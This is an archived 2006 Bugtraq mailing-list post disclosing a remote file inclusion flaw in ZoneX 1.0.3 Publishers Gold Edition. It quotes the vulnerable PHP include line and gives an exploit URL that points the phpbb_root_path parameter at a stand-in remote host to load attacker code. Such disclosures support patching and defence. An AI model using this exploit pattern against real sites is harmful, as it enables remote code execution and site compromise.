lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
This website is powered by Openwall GNU/*/Linux security-enhanced OS
[<prev] [next>] [month] [year] [list] 
Date: 3 Aug 2006 20:04:16 -0000
From: x0r0n@...mail.com
To: bugtraq@...urityfocus.com
Subject: ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion
 Vulnerability

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability     

- 

#Author: xoron

-

#script: ZoneX 1.0.3 - Publishers Gold Edition 

-

#Class : Remote

-

#cont@... x0r0n[at]hotmail[dot]com

-

#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)

-

#Exploit:
http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?


-

#Thanx : WWW.CYBER-WARRiOR.ORG

-

#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux